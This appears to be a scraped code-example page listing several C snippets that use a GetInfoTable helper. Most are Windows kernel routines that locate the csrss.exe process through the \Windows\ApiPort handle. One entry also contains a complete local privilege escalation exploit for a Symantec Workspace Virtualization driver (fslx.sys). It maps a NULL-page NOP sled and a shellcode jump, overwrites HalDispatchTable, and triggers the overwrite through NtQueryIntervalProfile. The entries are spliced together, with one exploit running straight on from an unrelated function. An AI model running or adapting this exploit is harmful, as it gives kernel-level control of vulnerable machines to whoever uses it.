Beispiel #1
0
HANDLE GetCsrPid()
{
	HANDLE Process, hObject;
	HANDLE CsrId = (HANDLE)0;
	OBJECT_ATTRIBUTES obj;
	CLIENT_ID cid;
	UCHAR Buff[0x100];
	POBJECT_NAME_INFORMATION ObjName = (PVOID)&Buff;
	PSYSTEM_HANDLE_INFORMATION_EX Handles;
	ULONG r;

	Handles = GetInfoTable(SystemHandleInformation);

	if (!Handles) return CsrId;

	for (r = 0; r < Handles->NumberOfHandles; r++)
	{
		if (Handles->Information[r].ObjectTypeNumber == 21) //Port object
		{
			InitializeObjectAttributes(&obj, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);

			cid.UniqueProcess = (HANDLE)Handles->Information[r].ProcessId;
			cid.UniqueThread = 0;

			if (NT_SUCCESS(NtOpenProcess(&Process, PROCESS_DUP_HANDLE, &obj, &cid)))
			{
				if (NT_SUCCESS(ZwDuplicateObject(Process, (HANDLE)Handles->Information[r].Handle,NtCurrentProcess(), &hObject, 0, 0, DUPLICATE_SAME_ACCESS)))
				{
					if (NT_SUCCESS(ZwQueryObject(hObject, ObjectNameInformation, ObjName, 0x100, NULL)))
					{
						if (ObjName->Name.Buffer && !wcsncmp(L"\\Windows\\ApiPort", ObjName->Name.Buffer, 20))
						{
						  CsrId = (HANDLE)Handles->Information[r].ProcessId;
						} 
					}

					ZwClose(hObject);
				}

				ZwClose(Process);
			}
		}
	}

	ExFreePool(Handles);
	return CsrId;
}
Beispiel #2
0
///////////////////////////////////////////////////////////////////////////////////
//
//	功能实现:枚举Csrss.exe进程PID
//	输入参数:无
//	输出参数:返回Csrss.exe进程的PID
//
///////////////////////////////////////////////////////////////////////////////////
HANDLE	GetCsrssPid()
{
	NTSTATUS			ntStatus;
	HANDLE				hProc, hObject;
	HANDLE				CsrssPid = (HANDLE)0;
	OBJECT_ATTRIBUTES	objAttr;
	CLIENT_ID			cid;
	int					i;
	UNICODE_STRING		ApiPortName;
	POBJECT_NAME_INFORMATION ObjName;
	PSYSTEM_HANDLE_INFORMATION_EX Handles;



	RtlInitUnicodeString( &ApiPortName, L"\\Windows\\ApiPort" );

	//获取句柄信息
	Handles = GetInfoTable( SystemHandleInformation );
	if( Handles == NULL )
	{
		DbgPrint("[GetCsrssPid]->GetInfoTable() Error\n");
		return 0;
	}

	ObjName = ExAllocatePool( PagedPool, 0x2000 );

	for( i = 0; i != Handles->NumberOfHandles; i++ )
	{
		if ( Handles->Information[i].ObjectTypeNumber == 21 ) //Port object,Win2kSP1下找不到21端口
		{
			InitializeObjectAttributes( &objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL );
			cid.UniqueProcess = (HANDLE)Handles->Information[i].ProcessId;
			cid.UniqueThread  = 0;

			//打开进程
			ntStatus = ZwOpenProcess( &hProc, PROCESS_DUP_HANDLE, &objAttr, &cid );
			if( NT_SUCCESS(ntStatus) )
			{
				//复制句柄
				ntStatus = ZwDuplicateObject( hProc, (HANDLE)Handles->Information[i].Handle,
												NtCurrentProcess(), &hObject, 0, 0, DUPLICATE_SAME_ACCESS );
				if( NT_SUCCESS(ntStatus) )
				{
					//查询对象
					ntStatus = ZwQueryObject( hObject, ObjectNameInformation, ObjName, 0x2000, NULL);
					if( NT_SUCCESS(ntStatus) )             
					{
						if (ObjName->Name.Buffer != NULL)
						{
							if ( wcsncmp( ApiPortName.Buffer, ObjName->Name.Buffer, 20 ) == 0 )
							{
								//获取Csrss.exe进程Pid
								CsrssPid = (HANDLE)Handles->Information[i].ProcessId;

								ZwClose( hProc );
								ZwClose( hObject );
								IxExFreePool( Handles );
								IxExFreePool( ObjName );
								return CsrssPid;
							}
						} 
					} else 
						DbgPrint("Error in Query Object\n");

					ZwClose(hObject);
				} else 
					DbgPrint("Error on duplicating object\n");

				ZwClose(hProc);
			} else 
				DbgPrint("Could not open process\n");
		}
	}

	IxExFreePool( Handles );
	IxExFreePool( ObjName );
	return 0;
}
int main(int argc, char* argv[])
{
	printf("Symantec Workspace Virtualization 6.4.1895.0 Local Privilege Escalation Exploit\n"
		"fslx.sys <= 6.4.1895.0\n"
		"\nBy MJ0011\n2013-7-17\[email protected]\nPRESS ENTER\n");
	
	
	getchar();
	PSYSTEM_MODULE_INFORMATION pinfo = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
	if (pinfo==0)
	{
		printf("cannot get system info\n");
		return 0 ; 
	}
	if (!InbvInit(pinfo->Module[0].Base , strrchr(pinfo->Module[0].ImageName , '\\') + 1))
	{
		printf("cannot init inbv system!\n");
		return 0 ; 
	}
	pNtQueryValueKey NtQueryValueKey = (pNtQueryValueKey)GetProcAddress(GetModuleHandle("ntdll.dll") ,"NtQueryValueKey");
	
	//alloc shellcode jump
	
	
	PNT_ALLOCATE_VIRTUAL_MEMORY NTAllocateVM = (PNT_ALLOCATE_VIRTUAL_MEMORY)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtAllocateVirtualMemory");
	
	
	PVOID BaseAddress = (PVOID)0x1 ; 
	ULONG dwsize = 0x1000 ; 
	LONG status ; 
	status = NTAllocateVM
		(
		GetCurrentProcess() , 
		&BaseAddress , 
		0 , 
		&dwsize , 
		MEM_COMMIT | MEM_RESERVE ,
		PAGE_READWRITE
);

	if (status !=0)
	{
		printf("err alloc vm %08x\n", status);
		getchar();
		return 0 ; 
	}
	//result length always <=0x800
	//0~0x800: NOP
	//0x800: shell code
	
	
	memset((PVOID)0x0 , 0x90 , 0x1000);
	*(BYTE*)((ULONG)0x800) = 0xe9 ; 
	*(ULONG*)((ULONG)0x801) = (ULONG)InbvShellCode - (ULONG)0x800 - 0x5 ; 
 
	//get haldispatchtable
	
	
	HMODULE hntos = LoadLibrary(strrchr(pinfo->Module[0].ImageName , '\\')+1);
	if (hntos == 0 )
	{
		printf("cannot load ntos\n");
		getchar();
		return 0 ; 
	}
	PVOID pHalDispatchTable = GetProcAddress(hntos , "HalDispatchTable");
	pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable - (ULONG)hntos);
	pHalDispatchTable = (PVOID)((ULONG)pHalDispatchTable + (ULONG)pinfo->Module[0].Base);
	PVOID xHalQuerySystemInformationAddr = (PVOID)((ULONG)pHalDispatchTable+ sizeof(ULONG));
	FreeLibrary(hntos);
 
	HKEY hkey ; 
	ULONG err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_READ , &hkey);
	
	
	if (err!=ERROR_SUCCESS)
	{
		printf("open key read failed %u\n" ,err);
		getchar();
		return 0 ; 
	}
	HKEY hkey2 ; 
	
	
	err = RegOpenKeyEx(HKEY_CURRENT_USER , "Software" , 0 , KEY_WRITE , &hkey2);
	
	
	if (err != ERROR_SUCCESS)
	{
		printf("open key write failed %u\n", err);
		getchar();
		return 0 ; 
	}
	DWORD dd ; 
	
	
	err = RegSetValueEx(hkey2 , "123" , 0 , REG_DWORD , (CONST BYTE*)&dd , sizeof(DWORD));
	
	
	if (err != ERROR_SUCCESS)
	{
		printf("set value %u\n" , err);
		getchar();
		
		
		return 0 ;
}	BYTE buffer[100];
	PVOID pbuf = buffer ; 

	UNICODE_STRING name ; 
	name.Buffer = NULL ; 
	name.Length = 0 ; 
	name.MaximumLength=0;
 	 status = NtQueryValueKey(hkey , &name , 2 , pbuf , 100 , (PULONG)xHalQuerySystemInformationAddr );

	//fire our shell code
	
	
	pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryIntervalProfile");

	NtQueryIntervalProfile(ProfileTotalIssues , 0 );

	return 0;
}
Beispiel #4
0
//获取csrss.exe进程
NTSTATUS GetCsrssPid(HANDLE *CsrssPid)
{
	NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;
	HANDLE Process, hObject;
	ULONG CsrId = 0;
	OBJECT_ATTRIBUTES obj;
	CLIENT_ID cid;
	POBJECT_NAME_INFORMATION ObjName;
	UNICODE_STRING ApiPortName;
	PSYSTEM_HANDLE_INFORMATION_EX Handles;
	ULONG i;

	PAGED_CODE();

	RtlInitUnicodeString(&ApiPortName, L"\\Windows\\ApiPort");

	Handles = (PSYSTEM_HANDLE_INFORMATION_EX)GetInfoTable( SystemHandleInformation );
	if( Handles == NULL ) {
		return STATUS_INSUFFICIENT_RESOURCES;
	}

	ObjName = (POBJECT_NAME_INFORMATION)ExAllocatePoolWithTag( PagedPool, 0x2000,  INFO_MEM_TAG);
	KdPrint(("SYS: Number of handles %d\n", Handles->NumberOfHandles));
	for(i = 0; i < Handles->NumberOfHandles; i++) {  
		//打开的对象的类型是否为21 Port object
		if (Handles->Information[i].ObjectTypeNumber == 21) {
			InitializeObjectAttributes(&obj, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
			cid.UniqueProcess = (HANDLE)Handles->Information[i].ProcessId;
			cid.UniqueThread  = 0;

			ntStatus = ZwOpenProcess(&Process, PROCESS_DUP_HANDLE, &obj, &cid);
			if(NT_SUCCESS(ntStatus)) {
				ntStatus = ZwDuplicateObject(
					Process, 
					(HANDLE)Handles->Information[i].Handle,
					NtCurrentProcess(), 
					&hObject, 
					0,
					0, 
					DUPLICATE_SAME_ACCESS);
				if(NT_SUCCESS(ntStatus)){
					ntStatus = ZwQueryObject(hObject, (OBJECT_INFORMATION_CLASS)ObjectNameInformation, ObjName, 0x2000, NULL);
					if(NT_SUCCESS(ntStatus)) {
						if (ObjName->Name.Buffer != NULL) {
							if (RtlCompareUnicodeString(&ApiPortName, &ObjName->Name, TRUE) == 0) {
								KdPrint(("SYS: Csrss PID:%d\n", Handles->Information[i].ProcessId));
								KdPrint(("SYS: Csrss Port - %wZ\n", &ObjName->Name));
								CsrId = Handles->Information[i].ProcessId;
							}
						}
						
					} else {
						KdPrint(("SYS: Error in Query Object\n"));
					}
					ZwClose(hObject);
				} else {
					KdPrint(("SYS: Error on duplicating object\n"));
				}
				ZwClose(Process);
			} else {
				KdPrint(("SYS: Could not open process\n"));
			}
		}
	}
	ExFreePoolWithTag( Handles, INFO_MEM_TAG);
	ExFreePoolWithTag(ObjName, INFO_MEM_TAG);
	*CsrssPid = (HANDLE)CsrId;
	return ntStatus;
}